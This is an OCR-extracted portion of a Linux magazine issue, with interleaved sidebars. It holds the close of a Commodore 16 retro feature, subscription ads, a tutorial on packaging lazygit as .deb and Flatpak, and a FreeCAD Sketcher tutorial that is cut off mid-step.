unit running an infinite loop in BASIC for 10 minutes.
The CPU (8501R1), TED (8360R2) and the PLA (251641-
GET MORE OF ANCIENT TIMES… Subscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
Commodore 16 TUTORIALS
02) were fitted with a heatsink via thermal adhesive
tape. The PLA is particularly fragile and a quick search
revealed that there are many alternatives. The DIN-
The Commodore 16 has different joystick and style joystick
datasette ports to the Commodore 64, but with the use ports of the
of an adaptor this could be worked around. The Commodore 16
electrical signals used in both ports on both machines are electrically
compatible with
are compatible. The only difference is the connector.
Commodore
Commodore elected to use the smaller DIN style ports
64 and Amiga
for the joysticks due to space constraints. joysticks. The
We already own a Commodore 64, along with an only difference
SD2IEC (www.thefuturewas8bit.com/shop/ is mechanical.
commodore/sd2iec-c.html) from The Future Was 8 Bit. Using a
This drive looks like the 1541 floppy disk drive and is compatible DIN
compatible with the C16. All we need is a £5 adaptor to plug and a nine-
power the drive from the cassette port (https://bit.ly/ pin DSUB we
lxf290c16) because the C16 doesn’t have a user port can make our
own adaptors.
from where we can steal power.
Replacement power supplies can be easily sourced.
The C16 uses a 9V DC power jack, but note that it’s
centre is negative. Check your polarity before applying
power, otherwise you’ll have lots of repair work to do.
As ever with classic hardware, do your research.
There are many ways in which a retro machine can
break. They might need a good clean, or a full refurb.
Watch the eBay listings for a while, see what the average
price is, and research the common faults that befall the
cheaper machines. If in doubt, reach out to the
community and watch a few YouTube repair videos from
Jan Beta, Adrian’s Digital Basement and The 8-bit Guy.
The legacy of the Commodore 16
Living in the shadow of a machine as great as the
Commodore 64 was never easy, and Commodore’s 264
family of machines never reached the sales of the C64.
That said, these machines have a lot to offer. They’re a
cheap and rewarding entry into retro hardware, and you
will learn a lot from this era of hardware.
How can a lowly Commodore 16 manage to do this?! This demo has a techno bassline, large 3D
objects and sprites that come out of nowhere. All this in just 12KB of RAM.
July 2022 LXF290 65
BACK ISSUES

BACK ISSUES MISSED ONE?

ISSUE 289 ISSUE 288 ISSUE 287
June 2022 May 2022 April 2022

Product code: Product code: Product code:

LXFDB0289 LXFDB0288 LXFDB0287

In the magazine In the magazine In the magazine

Discover what’s
new in the latest version of Ubuntu
with our guide. We bring you a
hands-on review of Valve’s Steam
Deck, rate five open source app
stores, explain how to deep-clean
your hard drives, get more from
the Windows system layer Wine,
run virtual machines with ease and
emulate the Amstrad PCW. Plus we
test your reflexes with a Python-
based reaction game!
From flashing
lights to image recognition and even
an aircraft tracking system – we
show you how to get more from
your Raspberry Pi. Elsewhere, we
transform photos and video with
the G’MIC plugin, emulate the Acorn
Archimedes, process satellite
imagery, find out how practical it is
to use a Pi as your daily driver, and
code memory-secure systems in
the programming language Rust.
Discover the ins
and outs of the Linux kernel. Then
turn your hand at open source
projects including ebook publishing,
home automation and organising
your research efforts. We test five
alternatives to Ubuntu, preview
Valve’s exciting Steam Deck
handheld console, and discover
how the Emmabuntüs collective
is distributing second-hand
computers to communities in need.

ISSUE 286 ISSUE 285 ISSUE 284

March 2022 February 2022 January 2021

Product code: Product code: Product code:

LXFDB0286 LXFDB0285 LXFDB0284

In the magazine In the magazine In the magazine

Not all VPNs
are created equally – find out how
to avoid second-rate services and
maintain your privacy online with
our in-depth feature. We also test
five GUI text editors, show how to
build a distro from the ground up
using Linux From Scratch, emulate
an MSX, set up multi-boot USB
devices, code a 3D game world, and
reveal the tools for managing your
passwords from the command line.
Stay one step
ahead of the nefarious perpetrators
of ransomware with our in-depth
feature. We bring you tutorials on
rock music effects, offline password
management and creating a virtual
network lab. Discover how to set up
a temperature display for your
Raspberry Pi and build web services
with Go and the Gin framework. We
also put five of the best GUI-based
backup tools through their paces.
Discover how
to turn your Raspberry Pi into an all-
singing, all-dancing media hub. We
put a spotlight on video conversion
tools, take you on a tour of Stacer,
the one-stop system management
tool, and emulate the Oric-1
(thankfully without that keyboard).
Discover how to build a Pi-powered
NAS and learn more on how the
world’s top-500 supercomputers all
harness the power of Linux.

To order, visit www.magazinesdirect.com

Select Single Issues from the tab menu, then select Linux Format.
Or call the back issues hotline on 0330 333 1113
or +44 (0)330 333 1113 for overseas orders.

Quote the Product code shown above and have your credit or debit card details ready

66 LXF290 July 2022 www.linuxformat.com

 UK readers
READING IN THE USA? turn to
p16

SUBSCRIBE!
Don’t wait for the latest issue to reach your local store –
subscribe today and let Linux Format fly straight to you.
Faster, cheaper and with DRM-free archive access!

3 GREAT
WAYS TO
SUBSCRIBE
Print, digita
l-only,
and print+d
igital
bundles!

USA REST OF THE WORLD EUROPE

From $132 From $132 From €100
For 13 issues For 13 issues For 13 issues

IT’S EASY TO SUBSCRIBE!

Visit www.magazinesdirect.com/linux-format
Call +44 0330 333 1113
Lines open Monday-Friday, 9am-5pm, UK time

www.techradar.com/pro/linux July 2022 LXF290 67

TUTORIALS Package building

DEBREATE
Credit: https://antumdeluge.github.io/debreate-web

How to roll your

own Linux packages
Installing from existing repos is too easy for Aaron Peters, who’s decided to
build his own native package. Here’s how you can follow in his footsteps.

he open source ecosystem provides us with

T such a bounty of great software. And while

modern distributions have come a long way in
collecting everything a typical user might want, you may
still find something that’s “not in the repos.” And while
OUR you can just compile it and plonk it down on your
system, in this article we’ll explore a couple of ways to
EXPERT make it fit in nicely with the rest of your software.
Aaron Peters Distribution publishers also do a great job of
has spent well collecting the best of open source software in their
over 20 years repos. Fedora contains an estimated 15,000 packages
exploring the in its main repo alone, while Ubuntu boasts over 60,000.
Linux ecosystem, So why not use the ones they provide? There might be
yet still needed to a couple of very good reasons you’d want to have
dig into how this software packaging in your pocket.
whole packaging The most obvious reason to roll your Linux packages
thing works. is for your own software. This needn’t be anything
fancy... it could just be a useful script you created that
you’d like to install to the system proper instead of just
your ~/bin directory. Of course, you may also want to
distribute it to a wider audience.
Furthermore, your distro’s repositories may not
include the program you want. And while you could
Assembling
install it in the “old school” fashion (see boxout, right),
a .DEB file by
installing a package gives you a clean way to manage it.
hand isn’t that
difficult, just Finally, your distro may include the program in
a little finicky. question, but at something less than the current version
They consist (especially if you’re running a Long Term Support
of a text file version). You can always grab the most recent version of
(debian- the binary and package it up to take advantage of the
binary) and most recent features.
two archives With these reasons in mind, we’ll look at a variety of
(control.tar. easy-to-use-tools targeting major formats.
xz and data.
tar.xz). A post
on the Ubuntu
Anatomy of a package
Forums (https:// There are a variety of package formats in the Linux
ubuntuforums. world. And although they’re all unique, there are a
org/show number of properties common across them:
thread.php?t= Manifest/control file: this contains metadata about
910717) gives the package, such as name, version number, developer/
a great step- maintainer, and in the case of native packages,
through of dependency information.
assembling a Partial filesystem: packages contain only the portions
binary Debian
of a directory structure that the program requires. In the
package.
simple example we’ll work with in the sections below,
The Control screen in Debreate provides an easy-to-use interface to
create the .DEB control file.
this consists of an executable (which will live in /usr/
bin), and two informational files that are distributed with
the binary (which we’ll place in usr/share/doc/lazygit).
Build/installation commands: packages can contain
commands or scripts that help configure the package.
In the .DEB format, for example, you can configure
scripts to run before and/or after installation, as well
as before and/or after removal. Uses for these might
include setting up system-level user accounts that
the application will use.
These items are combined into the package, which
is a compressed archive (for native packages) or an
output directory (in the case of containerised
programs). On installation, the data from the manifest
will be registered with the format’s internal catalogue.
Packages can be set up to either build the application
from source or created with the binary files that are
installed on the target system. Where they’re installed
depends on the format. Native packages will be installed
relative to the root directory, while containerised
packages have dedicated locations elsewhere (/snap for
Snap packages, and /var/lib/flatpak for Flatpaks).
Hopefully this provides you with a basic concept of
packages and their make-up. But we all know reading is
no substitute for rolling up one’s sleeves and doing, so
without further ado, let’s get to packaging!
Creating .deb packages
For this and the following exercises we’ll use a simple
example. The lazygit application is a perfect choice for a
couple of reasons, not least of which is that it’s a nice

68 LXF290 July 2022 www.linuxformat.com


text UI to interact with Git. It’s available in the standard
Ubuntu repositories; however, on 20.04 (the current
LTS) it’s on version 0.27.4, where the latest release from
the project’s GitHub account is v0.34. And downloading
the release tarball and peeking inside, we see that we’ve
only got three files to worry about: the README, the
LICENSE, and the executable itself.
We’ll start by creating a .DEB package for lazygit, so
our Ubuntu machine(s) will have the latest and greatest.
Debreate (https://antumdeluge.github.io/debreate-web)
is a graphical application that represents a great way to
start your packaging journey. You can install it from the
standard repos using the following command:
$ sudo apt install debreate
As you launch the program for the first time you’ll be
greeted with an intro screen (including a link to a
YouTube tutorial), then quickly shown the first screen in
the main interface, titled Control (see screenshot, left).
Package: give the package a name, consisting of lower
case letters, numbers, “+," “-," or ".” symbols.
Version: we’ll use the upstream version of lazygit for
this, adding a “-1” for our first build, for a result of 0.34-1.
Maintainer: put your own name here.
Email: likewise, your address.
Architecture: select the appropriate option from this
dropdown, probably “amd64”, possibly “arm”, or “all”,
meaning it’s processor-independent.
Section: this is the category where the package will
reside within a larger repository. You can take your cue
here from similar or related programs. Since lazygit
helps us use git, we’ll place it in the same VCS (Version
Control Systems) section.
Priority: according to the Debian/GNU FAQ, this
should be set to Optional.
Short Description: the description of the package in a
software manager like the Software Centre or Muon.
Long Description: this longer description will display
in a detailed view, such as when a package is selected in
a software manager, or by using apt-cache show .
You’ll notice an optional field titled Source in the
Debreate window. This is normally required in Debian
control files when the package will be compiled from
source. But since we’re merely packaging up a binary
file, we can skip this.
Once you’ve filled out all the above fields, select
File>Save from the main menu to save your progress
as a Debreate project, then click the right arrow button
to proceed. This will bring you to the page titled
Dependencies and Conflicts. Here you’ll detail what
other packages need to be present, as well as those that
should be absent. We can sneak a peek at the Ubuntu
version of the package with the following command:
$ apt show lazygit
This reveals it only requires git itself. So add this as a
dependency as follows:
In Dependency/Conflict Package Name, enter git .
Enter nothing in the Version field because any version
of git will do for us.
The Depends button should already be selected
within Categories.
Click the plus button to add this as a dependency.
However, we’re not done yet. Because lazygit exists
in the repos (in Ubuntu, at least), we want to make sure
our obviously superior version doesn’t get overwritten
by an update. We’ll add another entry to this page, this
www.techradar.com/pro/linux
Package building TUTORIALS
time selecting Replaces as the
category, and lazygit <= 0.33 .
So we’ll keep our up-to-date
version of this program until
something later and greater
comes out in the repos. With
these two things in place, click
the right arrow to move to the
next step.
The Files screen (right) is
where we’ll pick the actual
files to be included in the
package, as well as where they should be placed when Add the necessary
executables and
the package is installed. As mentioned, the archive from
other necessary
lazygit’s GitHub page only contained three files: the files to your project
executable, the LICENSE, and the README. We’ll place on Debreate’s
the program file in /usr/bin, and the two others in /usr/ Files screen.
share/doc/lazygit. The Files screen guides us through
the process of picking each file to be included from the
panel on the left, choosing where it should be placed on
install in the Target section to the right. Click that right
arrow once you’ve placed all the files that your program
requires.
There’s a couple other screens we don’t need for this
simple package, but are as follows:
Scripts: Debian packages support scripts to be run See how the
before install, after install, before removal, and/or after control files are
put together
removal. You can either enter the script content directly
by opening an
into this window, or link executables to run instead.
existing .DEB
Changelog: this is good practice when actively file. They’re
maintaining a package – you can put something here. archived
Copyright: again, you should generally include this, with the ar
and Debreate has some built-in templates to help. command, so
Menu Launcher: as a terminal application we’ll skip at the terminal
this, but we could set this up, because Debreate has the following
fields to even enable us to select which terminal it will extract their
should launch. contents: ar -x
<package file>.
Finally, we arrive on the Build screen (see overleaf).
Most desktop
You know what to do when you see those wrench and
archive tools
hammers crossed... click that button, and watch will open these
Debreate create your package. If you kept the ‘Check as well.
package for errors with lintian’ option checked and it
does find some errors, you can go back and check
your input on prior screens. But some of these aren’t
important for personal use. Provided the package
generates, you can see if it will install and run correctly
with the usual commands:
SOURCE-BASED INSTALLATION
The original install system was to download the source code, compile
it and run it. Subsequent processes such as make install would
place all the compiled resources in their proper locations. But another
valuable method for building from source is by compiling the source
packages. In Debian-based distros you can compile and install the
programs from their source code using a command such as:
sudo apt-src --build install <package name>
For most people there’s little value in compiling these source
packages. However, being able to compile software from source in
general is a useful skill. And you don’t need to be a developer to do it.
If you become comfortable with the old-school make ; make install
process, the chances of you not being able to use a given program
because it’s “not available” dwindles to almost nothing.
July 2022 LXF290 69
TUTORIALS Package building

$ sudo dpkg -i lazygit_0.34-1_amd64.deb $ flatpak install org.freedesktop.Platform//21.08 org.

$ lazygit freedesktop.Sdk//21.08
For Flatpaks, If the lazygit UI appears, hit the music, because As the screenshot shows (below), you may find you
check out you’ve just packaged your first Linux application! already have the platform installed (quite possible if
Flathub on you’ve installed other Flatpaks), and that one or both of
GitHub (https:// Flat ain’t no Snap these have other dependencies. Note the 21.08
github.com/ But what if you’re not a “distribution loyalist," whether appended to each Flatpak name, indicating we’re using
flathub). Browse to Debian/Ubuntu or a different one. Or perhaps you’d their August 2021 versions (the most recent, at the time
some of the like to distribute something to a wide variety of users, of writing). But this is nothing new to the seasoned
manifests regardless of what distro they use. Fortunately there are Linux pro, so proceed with the install.
for existing
a number of distribution-neutral package formats out Now we’re ready to assemble our program. There
programs and
how they’re
there, and (as we saw in LXF244) for an application like aren’t any GUI applications like Debreate to create
constructed. lazygit, Flatpak is an excellent option. Flatpaks, but fortunately the process for basic programs
Some are Before we get started with the package, make sure is straightforward. First, create a new working directory,
written in you have both the Flatpak base package, as well as the and move the lazygit binary, README, and LICENSE files
JSON, but it’s flatpak-builder package. In a Debian-based distro run into it. Now fire up your favourite text editor, and enter
easy enough $ sudo apt install flatpak flatpak-builder the following metadata for your package:
to read if you Now we can get to business. First, we’ll need to pick app-id: com.example.lazygit
know your way a Flatpak runtime. These are to Flatpak applications like runtime: org.freedesktop.Platform
around YAML. a base Linux distro is to native packages, in that it runtime-version: ‘21.08’
provides the underlying platform for the program to run. sdk: org.freedesktop.Sdk
There are three primary runtimes at the time of writing: command: lazygit
Freedesktop, which provides a foundation including finish-args:
GLib, D-Bus, PulseAudio, X11/Wayland, and GTK3. - --filesystem=home
GNOME, which extends the Freedesktop runtime with modules:
GNOME-specific libraries and support. - name: lazygit
KDE, which like the GNOME version adds some KDE- buildsystem: simple
specific bits to the Freedesktop runtime. build-commands:
Since lazygit is a console tool we don’t need anything - install -D lazygit /app/bin/lazygit
fancy. Even Freedesktop is probably overkill for it, but we - install -D README.md /app/usr/share/doc/lazygit/
need to choose something, and this is as compact as README.md
we can go. Install both the Freedesktop runtime and its - install -D LICENSE /app/usr/share/doc/lazygit/
SDK with the following command (see below): LICENSE
sources:
- type: file
path: lazygit
- type: file
path: README.md
At the click of a - type: file
button, Debreate path: LICENSE
assembles your - name: git
.DEB package, and
make-args:
even runs some
helpful checks - INSTALL_SYMLINKS=1
for you. - NO_PERL=YesPlease
- NO_TCLTK=YesPlease
make-install-args:
MORE PACKAGING OPTIONS - INSTALL_SYMLINKS=1
- NO_PERL=YesPlease
If Debian and Flatpak formats aren’t to your taste, here’s some more - NO_TCLTK=YesPlease
resources you can explore to try your hand at packaging applications. post-install:
alien: Available from the Ubuntu/Debian repos, it’ll convert Red Hat- - find . -type f -name perllocal.pod -delete
format .rpm packages into .deb files that you can install. sources:
RPM: Red Hat’s Sysadmin site has advice on creating your first - type: archive
.RPM package (www.redhat.com/sysadmin/create-rpm-package).
Snap: It may be a little controversial, but the fact remains that
Canonical’s Snap format has some advantages over Flatpak (it can be
used to run servers in addition to userland tools). Get started here:
https://ubuntu.com/tutorials/create-your-first-snap#1-overview.
AppImage: Has a simplicity – just download, enable (permissions),
execute. Check out the Packaging Guide (https://docs.appimage.
org/packaging-guide/index.html) to get started with this format.
EPM: The ESP Package Manager has the ability to create packages
in 11 formats from a single batch of files, including .DEB, .RPM, BSD
format, and macOS. Find out more at https://jimjag.github.io/epm. If you’ve installed a Flatpak before then there’s a good chance that
you’ll have the base utility, but not the builder application.

70 LXF290 July 2022 www.linuxformat.com


sha256: af5ebfc1658464f5d0d45a2bfd884c935fb607
a10cc021d95bc80778861cc1d3
url: https://mirrors.edge.kernel.org/pub/software/
scm/git/git-2.36.0.tar.xz
x-checker-data:
type: html
url: https://mirrors.edge.kernel.org/pub/
software/scm/git/
version-pattern: git-([d.-]+).tar.xz
url-template: https://mirrors.edge.kernel.org/
pub/software/scm/git/git-$version.tar.xz
Save this in your working directory as a YAML file,
with the value of the app-id field as the name (in the
example above, com.example.lazygit.yml ). Let’s
explore what’s going on in this manifest file for a
moment. The first four lines are specifying the Flatpak’s
name ( app-id ), as well as which runtime ( runtime and
runtime-version ) and SDK ( sdk ) it’s using. After that
comes the command it will provide, in this case lazygit .
Following this comes a directive ( finish-args ) that
provides the application access to the user’s home
directory (--filesystem=home).
Flatpak supports the concept of modules, which are
logical subdivisions it will assemble into the package.
These might be different parts of a software stack (for
example, the database component for a business
program), or your main program as well as other helper
applications (the Obsidian notetaking app, for example,
includes modules for Git and Pandoc). The first module
listed is lazygit itself. We’ll specify an assembly type of
“simple” ( buildsystem ), because we’re not actually
compiling the executable, just packaging it. For this
reason the next lines ( build-commands ) will merely
copy the files we placed in the working directory into
appropriate places in the Flatpak. Note Flatpaks use the
/app prefix which, along with other metadata such as
the app-id, system architecture and current package
version, dictates where it will live on the system once
installed. The screenshot (above) shows a typical
Flatpak file layout within the /var/lib/flatpak directory.
Finally, the last lines of the stanza (sources) catalogues
what we’re including, and what it is. While Flatpak’s
builder does support grabbing and extracting archives,
for the purposes of this article we’ll simply use the files
we already have.
But this alone won’t suffice. Remember how in
Debreate we had to specify a dependency on git?
Well the Flatpak will require access to git too, but
unfortunately won’t have access to the host system’s
executables to get it. Fortunately, the Obsidian team
already did this work for us. Grab their Git module
settings from the Obsidian Flatpak’s manifest
(https://github.com/flathub/md.obsidian.Obsidian/
blob/master/md.obsidian.Obsidian.yml, lines 27-46),
and drop those right into our file.
The manifest complete, all that’s left is to do the
actual assembly. From the working directory, run the
following command to build it:
$ flatpak-builder ./build com.example.lazygit.yml
The output should hopefully show a successful build,
and you can explore the build directory to confirm. Note
at the beginning of the process (shown in the screenshot,
GET LXF PRE-PACKAGED FOR YOUSubscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
Package building TUTORIALS
bottom right) how Flatpak fetches the source for Git, Once you get
far enough into
then compiles it. Next step is to install it. Unlike native the Flatpak
packagers, the process doesn’t actually generate an hierarchy, things
archive file. Instead, you can install it by pointing Flatpak start to look like a
to the build directory you created with the previous tiny, self-contained
Linux system.
command. To install it just for the current user, you can
use the following:
$ flatpak-builder --user --install --force-clean ./build
com.example.lazygit.yml
The --user flag here, like with the standard flatpak
command, installs the program just for the current user.
Adding --force-clean will also clear out the existing
contents of the build directory, for a sparkling new build.
Note in the output shown in the screenshot mention of
the Cache; Flatpak won’t build files that haven’t
changed, so in this case everything was already done.
Finally, change into a Git-controlled directory in
your home folder, and run your application with the
following command:
$ flatpak run com.example.lazygit
Once again, if the Lazygit UI fires up then you know
that your build is good (enough for your own personal
use, anyway)!
Learning how to package applications is a worthwhile
exercise even if you’re not “formally” a developer. As
with all things Linux, you’ll at least learn something
along the way. You may even develop some utility out of
creating your own packages, perhaps as a way to easily
get them installed on all your systems.
Yet in addition to all this, it will give you a little
appreciation for the effort of all the hard-working
volunteer packagers that go through a process much
more involved than the above to make sure that your
favourite programs are just a simple click or terminal
command away.
So thanks to all the packagers out there… because
this author sure doesn’t want to have to do this by hand
for the 4,000 packages and counting on his system!
You can see not
only your binaries
being copied,
but your source
being compiled in
the output from
flatpak-builder.
July 2022 LXF290 71
TUTORIALS CAD basics

FREECAD
Credit: www.freecadweb.org

Design 3D parts with

computer aided design
Make a 3D part in FreeCAD’s Sketcher workbench with Michael Reed,
even if you think an orthographic view is the inside of someone’s mouth.

reeCAD is a CAD (computer aided design) to work on in this month’s tutorial, and ranging all the

F program that can be used to design and

visualise 3D objects. It’s a parametric modeller
in that all dimensions are specified as parameters, and
they can be controlled like variables in computer
OUR programming. This also means that you can design a
complex 3D object and, at any time, alter any element
EXPERT that makes up that object.
Michael Reed FreeCAD is also a solid modeller, meaning that if you
could have had a cut a chunk out of a solid object in FreeCAD, it’s like
modelling career taking a bite out of an apple. By contrast,in a polygon-
– sexy parametric based modeller such as Blender, the objects that you
constructive work with are actually hollow.
solids modelling, FreeCAD can turn its hand to many different types of
that is. projects such as simple models like the one we’re going
THE SKETCHER WORKBENCH
1 2
3 have gone your own way and clicked the Create body
5 6
way up to detailed architectural design of buildings
and complex robotic concepts. The different areas
of specialisation are accessed through the various
workbenches of FreeCAD. For the purposes of this
tutorial, we’re going to spend most of our time in the
Part Design and Sketcher workbenches, and we’re going
to make a 3D object – an electronic enclosure.
Free as in design
Having launched FreeCAD, start by clicking the New icon
in the main toolbar to create a new document. Select
the Part Design workbench (not to be confused with the
Part workbench) in the drop-down in the main toolbar.
When you change from one workbench to another, you
should notice available tools in the toolbar change.
The sidebar has a window marked Combo View and
this has two tabs: Model and Tasks. If you look at the
content of the Tasks tab, it should offer the option of
creating a body inside the Start Part subwindow. The
Tasks tab will regularly make useful suggestions such as
this, and they’re based on the most common next steps
considering what you’re currently doing. Click Create
body in the Tasks tab. However, note that you could
icon in the toolbar instead, and the end result would
have been exactly the same.

4 Body of work
FreeCAD has a lot of toolbars…
1
You might want to move them around to
make sure that they’re all accessible.
The Workbench menu
2 Enables you to switch workbenches.
The Constraint toolbar
3 These tools make it possible for you to
limit the movement of different elements.
The Workbench area
4 This is where you draft out a 2D view of
a surface of the model. The moveable, editable
constraints are shown in red.
The Combo view
5 You’ll move freely between the Model
tab to obtain an overview of your work-in-
progress model, and the Tasks tab to carry
out your next action.
The 3D navigator
6 Use this feature if you want an exact view
such as ‘top’ or ‘right’ or to reorientate yourself
if you’re lost.
In FreeCAD, the ‘body’ is the object that the 3D elements
are attached to, and you can have more than one body
in a design. Having established that, this is a good point
to summarise what we’re going to do over the course of
this project. We’re going to attach a kind of 2D technical
drawing, called a ‘sketch’, to the body and then extrude
it to make a 3D box shape. Following this, we’re going to
add another sketch to the top face of this box and use
that to hollow out the inside of the box.
Follow the next suggestion in the Tasks tab by
selecting Create sketch. Again, you could have done this
by clicking the Create a New Sketch icon in the main
toolbar. When you create your first sketch, you’re asked
which plane you want to attach the sketch to. In our
case, we’re going to work as if we have a piece of paper
spread out flat on a table in front of us.

72 LXF290 July 2022 www.linuxformat.com


If we were designing an object like a door, we’d
probably start with a sketch attached to the XZ-plane
because that object would sit up vertically rather than
horizontally. However, we want to work on the XY-plane
because this is an object that’s best designed as though
we were looking down on it. For that reason, in either the
Tasks tab or by clicking within the 3D window, select
XY-plane and click OK. In the future, we can attach
sketches to surfaces on the model rather than a plane.
The Sketcher
FreeCAD will automatically switch to the Sketcher
workbench. As before, you should notice the available
tools in the toolbar area change to reflect the change
in workbench. Don’t worry if, at this point, the various
toolbars of the different workbenches look
overwhelming; you’ll soon learn to find your way around
because similar operations are grouped together.
Now we can place our first element into the sketch:
a rectangle representing the outline of the object that
we’re designing. In this case, hover over the tools until
you find the one with the tooltip that says Create
Rectangles and click it. Click in the main window area
to lay down a start point, move the mouse and click
again to fix the opposite corner of the rectangle in
place. At this point we don’t have to be specific about
measurements; we’re just laying down the basic shape.
If you look over at the Tasks tab, there’s a sub-
window called Solver messages and a warning that the
object is, for the moment, unconstrained and we have
four DoF (degrees of freedom). This is because we
haven’t told FreeCAD what the dimensions of the
rectangle are. You can test this by moving the points of
You’ll be spending quite a lot of time in the FreeCAD Sketcher. We’ve
laid down a rectangle and then constrained its dimensions.
WORKING WITH CONSTRAINTS
Constraints are key when you’re working
in FreeCAD. You’ve probably noticed that
when you add a constraint in the
sketcher, it adds a label to the diagram.
This label isn’t just for informational
purposes. For a start, it’s draggable and
you can place it where you like.
You can double-click constraints in
the Sketcher workbench to edit them.
Oh, and you can add measurements
using units other than the default of
millimetres. So, if you add a value of 10in,
it would convert it to 254mm for you.
www.techradar.com/pro/linux
CAD basics TUTORIALS
the rectangle around with the mouse. Before we can We’ve padded the
employ a sketch in the other parts of FreeCAD, we must sketch to 30mm to
add some height.
eliminate all degrees of freedom so that each element
We need to round
can’t move in any way, and we do this by the use of the corners next.
what’s called Constraints.
Constrain the rectangle
First, left-click an empty area of the drawing to make
sure that nothing is selected. You’ll have to get into the
habit of doing this because the FreeCAD Sketcher uses
sticky selection. All of the constraint icons are grouped
together and you need to find the Constrain Horizontal
Distance icon that looks like a capital letter ‘I’ on its side.
Click this and then click the top edge (the technical
term for straight line) of the rectangle. In the dialog that Don’t forget to
pops up, specify a length of 95mm. save! FreeCAD is
Whenever you’ve finished using a particular Sketcher a reliable piece
tool such as a Constraint, you can discontinue it by of software, but
it’s complex.
right-clicking in the main window area. Do this and have
Add a number
a go at moving the rectangle around with the mouse.
to the filename
You’ll see that you can alter the rectangle’s height and from time to
even move the rectangle around, but can no longer alter time so that you
its width because of the constraint we’ve added. The can step back.
solver window now tells us that we have gone from four
down to three degrees of freedom.
Left-click an empty area of the drawing to deselect
everything. Specify the height of the rectangle by
selecting the Constrain Vertical Distance icon in the
toolbar and then clicking one of the vertical edges of the
rectangle. Specify a length of 65mm and click OK. Right-
click in the main window to deselect the Height
There’s a small ‘fx’ icon in this field as
well, and this is the formula editor used
for adding calculations. For example, you
might want the height of an object to be
half of the width.
You can also give a constraint a name.
This means that it can be altered from
other areas of the program or referenced
using the formula editor. FreeCAD even
includes the Spreadsheet workbench, so
A plain rectangle. It’s constrained from the start
you can edit the values in that rather than because the start and end points of edges are
moving into a specific editor to obtain a joined by a coincident constraint, and the edges
value you need to alter. are either horizontally or vertically constrained.
July 2022 LXF290 73
TUTORIALS CAD basics
Constraint tool. We can now no longer change the
dimensions of the rectangle, but its overall position isn’t
Multiple yet locked in place.
selection in If we click the text in the solver telling us how many
the Sketcher degrees of freedom are left, the four corner points of
tool can be a the rectangle will be highlighted green. Any of these can
bit unwieldy. still move in the x- and y-axis, and this is the problem.
Always click There are a few different ways of locking the rectangle
a blank area in place, but the simplest is to lock the bottom corner
first before of it to the origin (centre point) of the sketch. This is
beginning your
selections.
the red dot at the intersection of the major lines on the
Then, click one
backdrop. This also introduces us to multiple selection
element after in the Sketcher.
another to Left-click an empty area of the sketch to deselect all.
multiple-select. Left-click the origin of the sketch and then left-click the
bottom corner of the rectangle. Locate the Constrain to
Coincident icon in the toolbar and click it. This should
lock those two points together, giving us a constrained
sketch. Once this is done, it’s time to take our sketch
into the 3D world, so click Close in the Tasks tab.
Because of the
rounded corners,
we measure height
from the first
points of the
upper and the
lower edge.
ADDING PILLARS
From the main Part Design screen select the model’s interior floor,
and click the Create Sketch icon. Use the Exterior Geometry tool so
that you can access geometry from another sketch. What we’re after
in this case is the four arcs that make up the corners of the outer
walls. Once these are clicked, each presents a point that’s the centre
of the arc. On these, create a circle by first clicking the centre point of
the corner arc. This constrains the centre of the circle. On each of
these, constrain the radius to 6mm using the Radius Constraint tool.
As ever, FreeCAD enables us to move back and forth between
different stages of our design. Back in the Part Design window, add a
5mm pad to the sketch to raise the pillars up. Consider going back
into the sketch and adding another concentric circle to each of the
pillars to make the screw holes.
We’ll add some pillars with mounting holes to the corners of the inner part of our box.
74 LXF290 July 2022
Now that we’re viewing the sketch in the Part Design
workbench, it should be represented as a flat 3D
rectangle. Let’s add some substance to it by extruding
it. Click the yellow Pad icon. Immediately, the object
becomes a 3D dimensional solid because it now has
some height to it. In the sidebar dialog, specify a length
of 30mm because we want that to be the height of our
object. You should now have a solid block in the middle
of the main window.
Round the corners
Let’s round the corners to make our box a bit more
attractive. In the Combo View>Model tab in the sidebar,
click the little triangle next to the Pad object to open it.
The sketch that we created is still in there, so double-
click it to open it. Click a blank space to fully deselect
everything. To round the corners of our box, locate the
Fillets tool in the toolbar and click it. Click two edges
that are connected together by a corner. An arc will now
be added between those two lines, which gives us a
round corner. Now repeat the procedure for the other
three corners.
One slight problem at this point: replacing the
corners with arcs has removed some of the constraints
because we had used corner points for them, but we’ll
fix that in a moment. Before that, we’ll constrain the
corner arcs so that they’re consistent. To do this, locate
the Constrain Arc or Circle tool in the toolbar and click it
with nothing selected. Click a corner arc. In the dialog
that pops up, input 8mm as the radius. Now do the
same for the other three corners.
Boxing clever
As we said, there’s a slight change to how we constrain
the edges of the box, now that the corners are curved.
Click a blank space to deselect all. Click the start point
of the topmost edge and then on the start point of the
bottom edge. As before, use the Constrain Vertical
Distance tool to specify a distance of 65mm between
these two points. Because the top and bottom lines of
the rectangle are parallel it makes no difference to the
width of the box that those points are no longer in the
corner of the box. Using this method, the overall width
and length of the object is exactly the same as if we had
been able to specify the line lengths as before.
Constrain the start points of the left and right
edges of the box in the same way, using the Constrain
Horizontal Distance tool. We now have one more
constraint to add before the sketch is fully constrained.
Click the first point of the bottom edge of the box and
then click the origin point of the sketch and use the
Back in the Sketcher tool and here we’re creating the interior of the
box. Pull the constraint labels out of the way if needed.
www.linuxformat.com

Just looking at the huge number of add-ons shows that FreeCAD is a
well-supported and extensible program.
Coincident constraint to lock them together. Click OK to
see the results of the changes, and you should now have
a solid box with nicely rounded corners.
Back to the Sketcher
Time to chop out the inside of the box. To add another
sketch, click the top part of the model in the 3D view to
select the top face of the model. Click the Create sketch
icon in the main toolbar. Because we clicked the top
face of the model before this step, this new sketch is
attached to that face.
You should now be back in the Sketcher workbench,
and seeing the existing model from above. As before,
create a rectangle, but this time make it smaller than
the outline of the existing model. As before, round the
edges and constrain those arcs to 8mm.
The first problem we have to solve at this point
is that we can’t click any parts of the existing model
because, although they’re visible, they’re derived from
another sketch. To get around this, locate the External
geometry icon in the toolbar and click it. To make the
edges from the first sketch available as reference points
in this second sketch, hover over the top, bottom and
side edges of the existing sketch and click them when
they become highlighted. Specifically, what we’re
interested in is the endpoints of those edges. Because
the edges of the box are parallel, we can specify the
distance between two lines (the inner and outer wall of
the box) by constraining the start points of each edge.
Click the start points of the top edge from the other
